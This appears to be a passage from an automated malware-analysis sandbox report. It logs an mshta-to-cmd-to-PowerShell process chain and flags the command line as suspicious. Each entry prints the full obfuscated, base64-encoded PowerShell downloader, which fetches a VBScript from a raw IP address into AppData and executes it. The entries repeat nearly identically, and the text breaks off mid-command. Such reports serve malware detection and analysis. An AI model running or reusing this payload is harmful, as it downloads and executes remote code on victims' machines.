                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Suspicious command line found
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; 